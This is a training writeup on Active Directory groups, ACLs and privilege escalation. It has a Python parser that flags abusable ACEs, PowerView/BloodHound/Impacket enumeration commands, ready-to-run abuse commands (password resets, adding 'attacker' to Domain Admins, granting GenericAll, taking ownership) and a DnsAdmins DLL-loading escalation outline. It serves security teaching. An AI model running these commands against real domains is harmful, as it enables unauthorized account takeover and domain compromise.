AD Groups and Permissions

Level: intermediate | Time: 30 min | Type: Writeup

Understanding groups, ACLs, and permission structures

Learning Objectives

  • Understand AD groups
  • Learn about ACLs and DACLs
  • Identify privileged groups
  • Understand delegation

In Active Directory, groups and permissions are how access is controlled. Understanding them matters because misconfigured permissions are among the most common attack paths: a single "tiny" right on the wrong group or object can hand an attacker Domain Admin.

Think of groups like keychains - they hold multiple keys (permissions). Give someone the keychain, they get all the keys. The question is: who has keychains they shouldn't have?

Group Types and Scopes

Group Types

  • Security Groups: Can be placed in ACLs and assigned permissions (what we care about)
  • Distribution Groups: Mail distribution only; cannot appear in an ACL (but note they can be converted to security groups, so a distribution group with odd members is still worth a look)

Group Scopes

Domain Local Groups:
├── Can contain: users/groups from any domain in the forest (and trusted domains)
├── Used for: permissions on resources in THIS domain only
└── Example: DL_FileShare_Read

Global Groups:
├── Can contain: users/groups from the SAME domain only
├── Used for: organizing users, then nesting into domain local groups
└── Example: G_HR_Staff (Domain Admins is also a global group)

Universal Groups:
├── Can contain: users/groups from ANY domain in the forest (membership is stored in the global catalog)
├── Used for: forest-wide access
└── Example: Enterprise Admins, Schema Admins

Best Practice (AGDLP):
Account -> Global -> Domain Local -> Permission

Memory Aid: AGDLP

Accounts go in Global groups, Global groups go in Domain Local groups, Domain Local groups get Permissions. Most environments don't follow this consistently; the resulting ad-hoc nesting (a "harmless" group nested into a privileged one, or a user granted rights directly) is exactly what you enumerate for.

High-Value Groups

Tier 0 - Domain Control:
├── Domain Admins - Full domain control; local admin on every domain-joined machine by default
├── Enterprise Admins - Full forest control (exists in the forest root domain only)
├── Schema Admins - Modify the AD schema (forest root domain only)
├── Administrators - Builtin group with full control of DCs and the domain
└── Domain Controllers - The computer accounts of all DCs in the domain

Builtin operator groups - nominally "Tier 1", but each one can reach DC control:
├── Server Operators - Log on to DCs interactively, manage services and shares
├── Backup Operators - SeBackupPrivilege: read any file on a DC (NTDS.dit, registry hives), backup/restore
├── Print Operators - SeLoadDriverPrivilege on DCs: load a driver
├── Account Operators - Create/modify users and groups (except protected admin groups); can log on to DCs
└── DnsAdmins - Manage DNS; can make the DNS service on a DC load a DLL (DA escalation on unpatched DCs, see below)

Tier 2 - Workstation/Server Access:
├── Remote Desktop Users - RDP access
└── Remote Management Users - WinRM access

Often Overlooked:
├── Group Policy Creator Owners - Create GPOs (they still need a link right to apply them anywhere)
├── Certificate Service DCOM Access - DCOM access to enrol against an AD CS CA; Authenticated Users are in it by default, which is why AD CS misconfigurations are reachable by any domain user
└── Pre-Windows 2000 Compatible Access - If it contains Everyone or Anonymous Logon, user and group objects are readable without credentials

DnsAdmins = Domain Admin

DnsAdmins can set the DNS server's ServerLevelPluginDll value (for example with dnscmd /config /serverlevelplugindll pointing at a UNC path), and the DNS service, which runs as SYSTEM on the DC, loads that DLL the next time it starts. Two caveats before you count on it: the DLL only loads on a service restart, which DnsAdmins are not necessarily permitted to trigger, and Microsoft hardened this path in a 2021 DNS server update, so it only works against unpatched DCs. It is also loud: the DNS service goes down, and the registry change is easy to spot.

Access Control Lists (ACLs)

Every AD object has a Security Descriptor containing an ACL. ACLs define who can do what to the object.

ACL Components

Security Descriptor:
├── Owner - Who owns the object (the owner implicitly holds ReadControl and WriteDACL)
├── DACL (Discretionary ACL) - Who can access
│   └── ACE (Access Control Entry)
│       ├── Trustee (Who - user/group SID)
│       ├── Access Mask (What - permission bits)
│       ├── Type (Allow/Deny) and flags (inheritance)
│       └── ObjectType GUID (object-specific ACEs only: which attribute, property set or extended right the mask applies to)
└── SACL (System ACL) - Auditing settings

Dangerous Permissions

GenericAll - Full control
├── Can modify anything on the object
├── Add members to groups, reset passwords, write SPNs, etc.
└── Includes WriteDACL and WriteOwner, so it is at least as powerful as ownership

GenericWrite - Modify attributes
├── On a group: change membership (the member attribute)
├── On a user: set servicePrincipalName (targeted Kerberoasting)
└── Write to other attributes that change how the account authenticates or logs on

WriteDACL - Modify permissions
├── Grant yourself any right on the object
└── Chain to GenericAll

WriteOwner - Take ownership
├── Become owner; the owner implicitly holds WriteDACL, so grant yourself GenericAll next
└── Not stealthy: the owner change is logged when auditing is on and is visible in the ACL

ForceChangePassword - Reset password (the User-Force-Change-Password extended right)
├── Take over user accounts
├── No need to know the current password
└── Noisy: the legitimate user's password stops working, so they notice

AddMember - Add to group (write access to the member attribute, or Self-Membership)
├── Add yourself or others to the group
└── Escalate via privileged group membership

Extended Rights

Some permissions are "Extended Rights" (control access rights). They are not a generic mask bit; they are matched by the ObjectType GUID in an object-specific ACE, so a review that only looks at Full Control and Write misses them. DCSync needs two of them on the domain object, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; User-Force-Change-Password is another. PowerView's -ResolveGUIDs is what turns those GUIDs into readable names.
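The parser below is an added example, not code from this writeup or from PowerView, BloodHound or Impacket. It walks a self-relative security descriptor in the binary layout nTSecurityDescriptor returns (header, owner SID, DACL, ACEs), then applies the classification from the two sections above, including ObjectType GUIDs for extended rights and single-attribute writes. The descriptor it parses is built inline as constructed sample input: the domain SID and RIDs are invented, the schema and rights GUIDs are the real ones.

```python
"""Walk a self-relative AD security descriptor (the bytes in nTSecurityDescriptor)
and flag ACEs that grant abusable rights. Pure Python, offline. The descriptor parsed
at the bottom is constructed here as sample input, not taken from a real domain."""
import struct
import uuid

# Access-mask bits that matter on directory objects
DS_WRITE_PROPERTY = 0x00000020
DS_CONTROL_ACCESS = 0x00000100   # extended right; meaning comes from the ObjectType GUID
WRITE_DAC         = 0x00040000
WRITE_OWNER       = 0x00080000
FULL_CONTROL      = 0x000F01FF   # what "GenericAll" looks like once stored on an AD object

# Real schema/rights GUIDs; the label is the BloodHound-style name used in the text
GUIDS = {
    uuid.UUID("00299570-246d-11d0-a768-00aa006e0529"): "ForceChangePassword",
    uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes",
    uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"): "DS-Replication-Get-Changes-All",
    uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2"): "AddMember",
    uuid.UUID("f3a64788-5306-11d1-a9c5-0000f80367c1"): "WriteSPN",
}
ACE_ALLOWED, ACE_ALLOWED_OBJECT = 0x00, 0x05   # deny ACEs (0x01, 0x06) are skipped below

def parse_sid(buf, off):
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs)))

def parse_dacl(sd):
    """Yield (ace_type, mask, object_type_guid_or_None, trustee_sid) for each DACL ACE."""
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x8000 or not control & 0x0004:
        raise ValueError("expected a self-relative descriptor with a DACL")
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off = dacl_off + 8
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        mask = struct.unpack_from("<I", sd, off + 4)[0]
        obj_type, sid_off = None, off + 8
        if ace_type == ACE_ALLOWED_OBJECT:
            flags = struct.unpack_from("<I", sd, off + 8)[0]
            sid_off = off + 12
            if flags & 0x1:                         # ACE_OBJECT_TYPE_PRESENT
                obj_type = uuid.UUID(bytes_le=sd[sid_off:sid_off + 16])
                sid_off += 16
            if flags & 0x2:                         # ACE_INHERITED_OBJECT_TYPE_PRESENT
                sid_off += 16
        yield ace_type, mask, obj_type, parse_sid(sd, sid_off)
        off += ace_size

def dangerous_rights(sd):
    """Return [(trustee_sid, right)] for allow ACEs that grant an abusable right."""
    found = []
    for ace_type, mask, obj_type, sid in parse_dacl(sd):
        if ace_type not in (ACE_ALLOWED, ACE_ALLOWED_OBJECT):
            continue
        if mask & FULL_CONTROL == FULL_CONTROL:
            found.append((sid, "GenericAll"))
            continue
        if mask & WRITE_DAC:
            found.append((sid, "WriteDacl"))
        if mask & WRITE_OWNER:
            found.append((sid, "WriteOwner"))
        if mask & DS_WRITE_PROPERTY and obj_type is None:
            found.append((sid, "GenericWrite"))       # write to every attribute
        if obj_type in GUIDS and mask & (DS_CONTROL_ACCESS | DS_WRITE_PROPERTY):
            found.append((sid, GUIDS[obj_type]))       # attribute- or right-specific ACE
    return found

# --- constructed sample descriptor (invented SIDs, real GUIDs) --------------------
def sid_bytes(sid):
    rev, authority, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def ace(mask, sid, obj_type=None):
    if obj_type is None:
        body = struct.pack("<I", mask) + sid_bytes(sid)
        return struct.pack("<BBH", ACE_ALLOWED, 0, 4 + len(body)) + body
    body = struct.pack("<II", mask, 0x1) + obj_type.bytes_le + sid_bytes(sid)
    return struct.pack("<BBH", ACE_ALLOWED_OBJECT, 0, 4 + len(body)) + body

def build_sd(owner, aces):
    dacl_body = b"".join(aces)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(dacl_body), len(aces), 0) + dacl_body  # ACL_REVISION_DS
    owner_b = sid_bytes(owner)
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 0, 0, 20 + len(owner_b))  # self-relative | DACL present
    return header + owner_b + dacl

DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"   # invented domain SID
ATTACKER, HELPDESK, DOMAIN_ADMINS = DOMAIN + "-1107", DOMAIN + "-1205", DOMAIN + "-512"
SAMPLE_SD = build_sd(DOMAIN_ADMINS, [
    ace(0x00020094, DOMAIN + "-513"),                                                       # Domain Users: read only
    ace(FULL_CONTROL, ATTACKER),                                                             # GenericAll
    ace(DS_CONTROL_ACCESS, HELPDESK, uuid.UUID("00299570-246d-11d0-a768-00aa006e0529")),    # ForceChangePassword
    ace(DS_WRITE_PROPERTY, HELPDESK, uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2")),    # write member
])

if __name__ == "__main__":
    for trustee, right in dangerous_rights(SAMPLE_SD):
        print(trustee, right)
```

Feed it the raw bytes from the ldapsearch query below (base64-decoded) and you get the same GenericAll/WriteDacl/extended-right classification PowerView and SharpHound produce, which is useful for checking what a tool is hiding behind a GUID. Deny ACEs are deliberately skipped here; real tooling has to honour them, and a deny ACE earlier in the DACL wins over a later allow.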

Enumerating Permissions

```powershell
# PowerView - find interesting ACLs
Import-Module .\PowerView.ps1    # or dot-source it: . .\PowerView.ps1

# ACEs whose trustee is not one of the default privileged principals; filter the output for SIDs you control
Find-InterestingDomainAcl -ResolveGUIDs

# Check the ACL on a specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find ACEs granted to a specific principal (your user, or a group you are in)
Get-DomainObjectAcl -ResolveGUIDs | ? {$_.SecurityIdentifier -match "S-1-5-21-...-1107"}
```

```cypher
// BloodHound (Cypher): every dangerous ACL edge between two distinct nodes
MATCH (n)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner]->(m)
WHERE n.name <> m.name
RETURN n,r,m
```

```bash
# Impacket - read an object's DACL (-target-dn takes a DN; -target takes a sAMAccountName)
dacledit.py -action read -target-dn 'CN=Domain Admins,CN=Users,DC=corp,DC=local' corp.local/user:pass

# ldapsearch for the raw security descriptor. The SD_FLAGS control (value 7 = owner|group|DACL) is
# needed: without it the server also tries to return the SACL, which needs SeSecurityPrivilege, and a
# non-admin bind gets no nTSecurityDescriptor at all.
ldapsearch -x -H ldap://dc.corp.local -D "user@corp.local" -w 'pass' \
  -E '!1.2.840.113556.1.4.801=::MAMCAQc=' \
  -b "CN=Domain Admins,CN=Users,DC=corp,DC=local" nTSecurityDescriptor
```

ACL Abuse Examples

GenericAll on User

```powershell
# Reset the user's password (the old password stops working, so the user will notice)
Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Or with net commands
net user target NewPassword123! /domain
```

GenericAll on Group

```powershell
# Add yourself to the group
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

# Or with net commands
net group "Domain Admins" attacker /add /domain
```

WriteDACL Abuse

```powershell
# Grant yourself GenericAll on the group
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All

# You now hold GenericAll on the group and can add yourself as a member (see GenericAll on Group above)
```

WriteOwner Abuse

```powershell
# Take ownership of the object
Set-DomainObjectOwner -Identity target -OwnerIdentity attacker

# The owner implicitly holds WriteDACL, so there is no separate "grant WriteDACL" step:
# go straight to Add-DomainObjectAcl ... -Rights All, then abuse GenericAll as above
```

Knowledge Check


Which permission allows you to modify an object's ACL?

Challenges

Find the Path


Using BloodHound, find an attack path from your current user to Domain Admin that involves ACL abuse.


Key Takeaways

  • Security groups control access; distribution groups are for email only
  • Domain Admins, Enterprise Admins, Schema Admins are highest value
  • The builtin operator groups (DnsAdmins on unpatched DCs, Backup Operators, Server Operators, Print Operators, Account Operators) can each escalate to Domain Admin
  • GenericAll, WriteDACL, WriteOwner are dangerous permissions
  • ACL misconfiguration is a common path to privilege escalation
  • BloodHound is essential for finding ACL-based attack paths